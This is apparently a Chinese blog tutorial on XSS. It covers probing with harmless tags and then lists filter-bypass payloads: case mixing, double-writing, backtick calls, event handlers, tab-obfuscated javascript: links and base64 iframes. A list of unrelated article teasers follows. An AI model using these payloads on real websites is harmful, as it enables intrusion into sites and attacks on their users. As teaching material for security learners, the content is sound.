当前位置：首页 > news >正文

XSS的应用

news 来源：原创 2025/7/21 14:15:34

免责声明，本博客只是用来自身学习记录，不要运用里面的代码去进行违法犯罪行为。

XSS

首先需要知道的是xss误区，就是在不确定是否有XSS的情况下，不应该是直接上攻击payload，例如<script>alert(123)</script>，而是应该去进行一个XSS探测先确认有无XSS。
以下三种情况就是可能你直接一个payload过去毫无反应，但是你根本确定不了是否存在XSS

1.waf直接给你拦截了，你payload根本打不进去。
2.对方后端就过滤死了不让你使用</script>这种明显的标签。
3．对方压根就不允许弹框。

引用借鉴up主的关键句：XSS本质

XSS的本质原理就是解析了用户插入的标签，那么既然是解析标签，就可以插入没有攻击危害的标签进行先探测XSS。
如果解析标签成功，确认存在XSS，你再一步一步绕过那“三个大麻烦’，去搞攻击型payload看看是否存在XSS漏洞

下面都是无危害探测标签，基本不会触发任何WAF

<s>123
<h1>123</h1>
<p>123</p>
</tExtArEa><h1>123</h1>#
</tExtArEa><s>123#//--+
*"></tExtArEa><s>123#//--+

学习网站 XSS学习靶场

上面讲述了XSS的本质，就是看是否有网站解析，那网站解析结果就可以弹出来是否存在XSS，这个具体要看响应包，附以下截图
在这里插入图片描述
通过上面操作可以跳过waf，接下来说XSS的绕过手段

XSS绕过

一、XSS基础绕过

大小写绕过

<Script>alert(1)</Script>

双写绕过

<script<script>>alert(1)</sc</script>ript>

禁用alert绕过

<img src="1" onerror="confirm('xss')"> （双引号可加可不加)
<script>confirm(1)</script>
<script>prompt(1)</script>

禁用单引号

数字可以不加单引号
<script>confirm(`xss`)</script>
<script>confirm(/xss/)</script>

过滤括号（）
可以使用反单引号代替 `

<script>alert`1`</script>

禁用尖括号<>，只考虑在value属性里面
也就是闭合value属性，加入触发事件

payload-hello' onmouseover='javascript:alert(1)'

空格的代替
空格的url编码为：%20

可替换成如下：
%09 %80a %8Ob %80c %Od %a0 /

单引号的代替
可以将单引号’换成飘号`

二、XSS混淆绕过

以下是比较好用的几个标签

</tExtArEa>'"<a/href="ja%26Tab;vas%26Tab;cript%26Tab;%26Tab;
%26Tab;:%26Tab;%26Tab;top%26Tab;[8680439..(30)]()">click_me</a>#

<div class=\"media-wrap image-wrap\"><img
src=\"https://img.threatbook.cn/c375eed802260503b4cee1086ea6
5f0e172480015227cf81a82d77.png\"
onerror=\"alert`1`\"/></div>

<script%20type="text/javascript">%20var%20reg%20=%20/test/;%
20var%20str%20=%20%27testString%27;%20var%20result%20=%20reg
.exec(str);%20alert(result);%20</script>

三、XSS编码加密绕过

套一层Base64

<iframe
src="data:text/html;base64,PFNDcmlwdD5hbGVydCgxKTwvU0NyaXB0Pg=="></iframe>

套两层Base64

<iframe
src="PG9iamVjdCBkYXRhPQ0KZGF0YTp0ZXh0L2h0bWw7YmFzZTY0LCBQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDQ9Pjwvb2JqZWN0Pg=="></iframe>

XSS的应用

免责声明，本博客只是用来自身学习记录，不要运用里面的代码去进行违法犯罪行为。 XSS 首先需要知道的是xss误区，就是在不确定是否有XSS的情况下，不应该是直接上攻击payload，例如<script>alert(123)</script&…...

编程日记 2025/7/21 14:15:34

FastAPI WebSocket 聊天应用详细教程

项目简介这是一个基于 FastAPI 和 WebSocket 实现的实时聊天应用，支持一对一聊天、离线消息存储等功能。技术栈后端：FastAPI (Python)前端：HTML、JavaScript、CSS通信：WebSocket认证：简单的 token 认证项目结构…...

编程日记 2025/6/29 11:54:53

【C语言】动态内存的常见错误

前言： 在上章节中讲解了动态内存的概念和管理的核心函数。在本章节继续为大家介绍动态内存的常见错误，让大家更好的理解运用。补充：使用内存函数需要头文件<stdlib.h> 对NULL指针的解引用操作当使用malloc、calloc或realloc等函…...

编程日记 2025/7/21 14:01:59

Missashe考研日记-day24

Missashe考研日记-day24 1 专业课408 学习时间：2h30min学习内容： 今天把剩下的两个经典同步问题和管程部分的课看了，然后做课后习题。这部分的重点在PV大题，很多很经典，不过第一轮不打算做大题，把选择题做…...

编程日记 2025/6/29 10:42:29

精益数据分析（13/126）：洞察数据关系，灵活调整创业方向

精益数据分析（13/126）：洞察数据关系，灵活调整创业方向大家好！在创业和数据分析的探索之路上，每一次的学习都是成长的宝贵机会。今天，咱们接着深入学习《精益数据分析》，一起探索相…...

编程日记 2025/6/29 9:39:37

常用python爬虫框架介绍

文章目录前言1. Scrapy2. BeautifulSoup 与 Requests 组合3. Selenium4. PySpider 前言 Python 有许多优秀的爬虫框架，每个框架都有其独特的特点和适用场景。以下为你详细介绍几个常用的 Python 爬虫框架： Python 3.13.2 安装教程（附安装包…...

编程日记 2025/6/29 11:45:58

HarmonyOS：网络HTTP数据请求

导读场景介绍接口说明request接口开发步骤requestInStream接口开发步骤证书锁定预置应用级证书预置证书公钥哈希值JSON配置文件示例场景介绍通过HTTP发起一个数据请求，支持常见的GET、POST、OPTIONS、HEAD、PUT、DELETE、TRACE、CONNECT方法接口说明 HTTP数据…...

编程日记 2025/7/21 14:01:58

CoinNexus Chain 推出泰利风暴，开启 Web3.0 智能金融元宇宙科技新时代

4月25日，CoinNexusChain 区块链正式推出开创性的“泰利风暴”（Terry Storm），再次展现了其前瞻性的视野和非凡的潜力。这标志着 CoinNexusChain 在 Web3.0 创新浪潮中迈出了重要一步。 Terry是一种创新的 RWA 金融激励机制&…...

编程日记 2025/6/29 9:40:23

编译opencv源码使得opencv-python获得gstreamer支持

我个人习惯在miniconda中使用python版本的opencv，使用pip进行安装时，默认的包并不会有gstreamer支持，我尝试过自己编译opencv-python，编出的包有各种各样的问题。最终还是决定自己从opencv仓库源码自行编译。安装gstreamer apt…...

编程日记 2025/6/29 9:39:31

眼镜眨巴眨巴-一步几个脚印从头设计数字生命2——仙盟创梦IDE

import cv2 import mediapipe as mp import numpy as np import timemp_drawing mp.solutions.drawing_utils mp_face_mesh mp.solutions.face_mesh# 加载图片 image cv2.imread(wlzc.jpg) # image_height, image_width, _ image.shape# 初始化面部网格模型 with mp_face_…...

编程日记 2025/6/29 9:39:30

django之数据的翻页和搜索功能

数据的翻页和搜素功能目录 1.实现搜素功能 2.实现翻页功能一、实现搜素功能我们到bootstrap官网, 点击组件, 然后找到输入框组, 并点击作为额外元素的按钮。我们需要使用上面红色框里面的组件, 就是搜素组件, 代码部分就是下面红色框框出来的部分。把这里的代码复制…...

编程日记 2025/7/21 14:02:00

linux复习

1.关于进程 1.1 概念用户角度：进程是程序的一次执行实例，也就是正在运行的程序内核角度：操作系统分配内存和cpu资源的实体操作系统使用内核数据结构程序的代码及数据描述进程，Linux中对应的内核数据结构就是task_struct…...

编程日记 2025/7/9 18:42:59

Post-Processing PropertySource instance详解和 BeanFactoryPostProcessor详解

PropertySourcesBeanFactoryPostProcessor详解 1. 核心概念 BeanFactoryPostProcessor 是 Spring 框架中用于在 BeanFactory 初始化阶段对 Environment 中的 PropertySource 进行后处理的接口。它允许开发者在 Bean 创建之前对属性源进行动态修改，例如添加、删除…...

编程日记 2025/7/21 13:45:10

go 编译的 windows 进程（exe）以管理员权限启动（UAC）

引言 windows 系统，在打开某些 exe 的时候，会弹出“用户账户控制(UAC)”的弹窗 “你要允许来自xx发布者的此应用对你的设备进行更改吗？” UAC（User Account Control，用户账户控制）是 Windows 操作系统中的…...

编程日记 2025/7/21 13:48:41

Elasticsearch性能优化实践

一、背景与挑战基金研报搜索场景中，我们面临以下核心挑战： 数据规模庞大：单索引超500GB原始数据，包含300万份PDF/Word研报文档查询性能瓶颈：复杂查询平均响应时间超过10秒，高峰期CPU负载达95%存储…...

编程日记 2025/6/29 9:39:35

【Web API系列】Web Shared Storage API 深度解析：WindowSharedStorage 接口实战指南

前言在当今 Web 应用日益复杂的背景下，跨页面数据共享与隐私保护已成为现代浏览器技术演进的重要命题。传统 Web 存储方案（如 Cookies、LocalStorage）在应对多维度用户特征存储、跨上下文数据共享等场景时，逐渐暴露出技术瓶颈与…...

编程日记 2025/6/29 10:20:12

Eureka、LoadBalance和Nacos

Eureka、LoadBalance和Nacos 一.Eureka引入1.注册中心2.CAP理论3.常见的注册中心二.Eureka介绍1.搭建Eureka Server 注册中心2.搭建服务注册3.服务发现三.负载均衡LoadBalance1.问题引入2.服务端负载均衡3.客户端负载均衡4.Spring Cloud LoadBalancer1).快速上手2)负载均衡策…...

编程日记 2025/6/29 12:11:41

智能体MCP 实现数据可视化分析

参考：在线体验 https://www.doubao.com/chat/ 下载安装离线体验 WPS软件上的表格分析云上创建阿里mcp：https://developer.aliyun.com/article/1661198 （搜索加可视化）案例用cline 或者cherry studio实现 mcp server：excel-mcp-server、quickchart-mcp-server...

编程日记 2025/6/29 12:31:07

3小时速通Python-Python学习总部署、总预览（一）

目录 Python的关键字有哪些： 编辑代码：1-5： 代码：6-10： 代码：11-15： 代码：16-20： 代码：21-25： 代码：26-27： Pyt…...

编程日记 2025/6/29 10:40:48

机器学习基础 - 分类模型之决策树

决策树文章目录决策树简介决策树三要素1. 特征的选择1. ID32. C4.53. CART2. 剪枝处理0. 剪枝的作用1. 预剪枝2. 后剪枝QA1. ID3, C4.5, CART 这三种决策树的区别2. 树形结构为何不需要归一化？3. 分类决策树与回归决策树的区别4. 为何信息增益会偏向多取值特征？4. 为何信息…...

编程日记 2025/6/29 11:57:25

Java面向对象的三大特性

## 1. 封装（Encapsulation） 封装是将数据和操作数据的方法绑定在一起，对外部隐藏对象的具体实现细节。通过访问修饰符来实现封装。示例代码： java public class Student { // 私有属性 private String name; private int age; …...

编程日记 2025/6/29 10:02:56

【Pandas】pandas DataFrame truediv

Pandas2.2 DataFrame Binary operator functions 方法描述DataFrame.add(other)用于执行 DataFrame 与另一个对象（如 DataFrame、Series 或标量）的逐元素加法操作DataFrame.add(other[, axis, level, fill_value])用于执行 DataFrame 与另一个对象&…...

编程日记 2025/6/29 9:55:40

GTS-400 系列运动控制器板（六）----修改编码器计数方向

运动控制器函数库的使用运动控制器驱动程序、 dll 文件、例程、 Demo 等相关文件请通过固高科技官网下载，网址为： www.googoltech.com.cn/pro_view-3.html 1 Windows 系统下动态链接库的使用在 Windows 系统下使用运动控制器，首先要安装驱动程序。在安装前需要提…...

编程日记 2025/6/29 11:32:30

卷积神经网络迁移学习：原理与实践指南

引言在深度学习领域，卷积神经网络(CNN)已经在计算机视觉任务中取得了巨大成功。然而，从头开始训练一个高性能的CNN模型需要大量标注数据和计算资源。迁移学习(Transfer Learning)技术为我们提供了一种高效解决方案，它能够将预训练模型的知识…...

编程日记 2025/6/29 11:12:54

Django 入门实战：从环境搭建到构建你的第一个 Web 应用

Django 入门实战：从环境搭建到构建你的第一个 Web 应用恭喜你选择 Django 作为你学习 Python Web 开发的起点！Django 是一个强大、成熟且功能齐全的框架，非常适合构建中大型的 Web 应用程序。本篇将通过一个简单的例子，带你走完…...

编程日记 2025/7/7 7:51:17

【后端】构建简洁的音频转写系统：基于火山引擎ASR实现

在当今数字化时代，语音识别技术已经成为许多应用不可或缺的一部分。无论是会议记录、语音助手还是内容字幕，将语音转化为文本的能力对提升用户体验和工作效率至关重要。本文将介绍如何构建一个简洁的音频转写系统，专注于文件上传、云存储以及…...

编程日记 2025/6/29 10:51:18

http通信之axios vs fecth该如何选择？

在HTTP通信中，axios和fetch都是常用的库或原生API用于发起网络请求。两者各有特点，适用于不同的场景。下面详细介绍它们的差异和各自的优势： fetch 特点： 原生支持：fetch是现代浏览器内置的API，不需要额外…...

编程日记 2025/6/29 11:13:39

iostat指令介绍

文章目录 1. 功能介绍2. 语法介绍3. 应用场景4. 示例分析 1. 功能介绍 iostat (input/output statistics)，是 Linux/Unix 系统中用于监控 CPU 使用率和磁盘 I/O 性能的核心工具，可实时展示设备负载、吞吐量、队列状态等关键指标。可以使用 man iostat查…...

编程日记 2025/7/21 9:51:39

NLP高频面试题（五十）——大模型（LLMs）分词（Tokenizer）详解

在自然语言处理（NLP）任务中，将文本转换为模型可处理的数字序列是必不可少的一步。这一步通常称为分词（tokenization），即把原始文本拆分成一个个词元（token）。对于**大型语言模型（LLM，Large Language Model，大型语言模型）**而言，选择合适的分词方案至关重要：分词的…...

编程日记 2025/7/6 11:28:00

桌面我的电脑图标不见了怎么恢复恢复方法指南

在Windows操作系统中，“我的电脑”或在较新版本中称为“此电脑”的图标，是访问硬盘驱动器、外部存储设备和系统文件的重要入口。然而，有些用户可能会发现桌面上缺少了这个图标，这可能是由于误操作、系统设置更改或是不小心删除造成…...

编程日记 2025/7/20 10:27:12

【Qt】控件的理解和基础控件 QWidget 属性详解（通俗易懂+附源码+思维导图框架）

每日激励：“不设限和自我肯定的心态：I can do all things。 — Stephen Curry” 绪论： 通过上一章对信号槽的理解相信你对Qt的认识肯定有了很大的进步，下面将通过本篇文章带你深入的认识Widget控件（主窗口&#xff0…...

编程日记 2025/7/14 17:08:29

oracle将表字段逗号分隔的值进行拆分,并替换值

需求背景：需要源数据变动，需要对历史表已存的字段值根据源数据进行更新。如果是单字段存值，直接根据映射表关联修改即可。但字段里面若存的值是以逗号分割，比如旧值：‘old1,old2,old3’，要根据映射关系调整…...

编程日记 2025/7/3 12:17:51

用c语言实现——一个带头节点的链队列，支持用户输入交互界面、初始化、入队、出队、查找、判空判满、显示队列、遍历计算长度等功能

一、知识介绍带头节点的链队列是一种基于链表实现的队列结构，它在链表的头部添加了一个特殊的节点，称为头节点。头节点不存储实际的数据元素，主要作用是作为链表的起点，简化队列的操作和边界条件处理。 1.节点结构链队列的每…...

编程日记 2025/6/29 12:16:12

webpack基础使用了解（入口、出口、插件、加载器、优化、别名、打包模式、环境变量、代码分割等）

目录 1、webpack简介2、简单示例3、入口(entry)和输出(output)4、自动生成html文件5、打包css代码6、优化（单独提取css代码）7、优化（压缩过程）8、打包less代码9、打包图片10、搭建开发环境（webpack-dev-server&#xf…...

编程日记 2025/7/7 6:16:00

【项目】基于MCP+Tabelstore架构实现知识库答疑系统

基于MCPTabelstore架构实现知识库答疑系统整体流程设计（一）Agent 架构（二）知识库存储（1）向量数据库Tablestore（2）MCP Server （三）知识库构建（1&a…...

编程日记 2025/6/29 9:39:33

C语言高频面试题——malloc 和 calloc区别

在 C 语言中，malloc 和 calloc 都是用于动态内存分配的函数，但它们在内存初始化、参数形式和使用场景上有显著区别。以下是详细的对比分析： 1. 函数原型 malloc void* malloc(size_t size);功能：分配未初始化的连续内存块…...

编程日记 2025/7/17 7:01:14

深入探讨JavaScript性能瓶颈与优化实战指南

JavaScript作为现代Web开发的核心语言，其性能直接影响用户体验与业务指标。随着2025年前端应用的复杂性持续增加，性能优化已成为开发者必须掌握的核心技能。本文将从性能瓶颈分析、优化策略、工具使用三个维度，结合实战案例，系统梳理JavaScript性能优化的关键路径。一、Ja…...

编程日记 2025/6/29 10:16:56

[创业之路-376]：企业法务 - 创业，不同的企业形态，个人承担的风险、收益、税费、成本不同

在企业法务领域，创业时选择不同的企业形态，个人在风险承担、收益分配、税费负担及运营成本方面存在显著差异。以下从个人独资企业、合伙企业、有限责任公司、股份有限公司四种常见形态展开分析： 一、个人承担的风险个人独资企业风险类型&…...

编程日记 2025/6/29 11:43:54

【Lua】Lua 入门知识点总结

Lua 入门学习笔记本教程旨在帮助有编程基础的学习者快速入门Lua编程语言。包括Lua中变量的声明与使用，包括全局变量和局部变量的区别，以及nil类型的概念、数值型、字符串和函数的基本操作，包括16进制表示、科学计数法、字符串连接、函数声明…...

编程日记 2025/6/29 11:53:39

低空经济 WebGIS 无人机配送 | 图扑数字孪生

2024 年，”低空经济” 首次写入政府工作报告，在政策驱动下各地纷纷把握政策机遇，从基建网络、场景创新、产业生态、政策激励等方面，构建 “规划-建设-应用-赋能” 的系统性布局，作为新质生产力的重要体现，推…...

编程日记 2025/7/15 3:17:33

【程序员 NLP 入门】词嵌入 - 如何基于计数的方法表示文本？（★小白必会版★）

🌟 嗨，你好，我是青松 ！ 🌈 希望用我的经验，让“程序猿”的AI学习之路走的更容易些，若我的经验能为你前行的道路增添一丝轻松，我将倍感荣幸！共勉~ 【程序员 NLP 入门】词…...

编程日记 2025/7/18 1:34:17

基于机器学习的多光谱遥感图像分类方法研究与定量评估

多光谱遥感技术通过获取可见光至红外波段的光谱信息，为地质勘探、农业监测、环境调查等领域提供了重要支持。与普通数码相机相比，多光谱成像能记录更丰富的波段数据（如近红外、短波红外等），从而更精准地识别地物特征。…...

编程日记 2025/7/21 9:38:49

BEVDepth: Acquisition of Reliable Depth for Multi-View 3D Object Detection

背景基于多视角图片的3D感知被LSS证明是可行的，它使用估计的深度将图像特征转化为3D视椎，再将其压缩到BEV平面上。对于这个得到的BEV特征图，它支持端到端训练以及各种下游任务。但是对于深度估计这一块学习的深度质量如何，到目前为止没有相关工作研究。贡献本文的贡献…...

编程日记 2025/6/29 11:52:17

【Linux】静态库动态库

🌻个人主页：路飞雪吖~ 🌠专栏：Linux 目录一、👑静态库和动态库静态库： 动态库： 🌠手动制作静态库 && 手动调用一下我们自己写的静态库 1> 安装到系统里面 ✨生成静…...

编程日记 2025/7/19 22:04:38

Java转Go日记（六）：TCP黏包

服务端代码如下： // socket_stick/server/main.gofunc process(conn net.Conn) {defer conn.Close()reader : bufio.NewReader(conn)var buf [1024]bytefor {n, err : reader.Read(buf[:])if err io.EOF {break}if err ! nil {fmt.Println("read from client…...

编程日记 2025/6/29 10:36:26

（51单片机）LCD显示温度（DS18B20教程）（LCD1602教程）（延时函数教程）（单总线教程）

演示视频： LCD显示温度源代码如上图将9个文放在Keli5 中即可，然后烧录在单片机中就行了烧录软件用的是STC-ISP，不知道怎么安装的可以去看江科大的视频： 【51单片机入门教程-2020版程序全程纯手打从零开始入门】https://www.…...

编程日记 2025/7/16 4:13:23

【通过Docker快速部署Tomcat9.0】

文章目录前言一、部署docker二、部署Tomcat2.1 创建存储卷2.2 运行tomcat容器2.3 查看tomcat容器2.4 查看端口是否监听2.5 防火墙开放端口三、访问Tomcat 前言 Tomcat介绍 Tomcat 是由 Apache 软件基金会（Apache Software Foundation）开发的一个开源 …...

编程日记 2025/6/29 12:31:40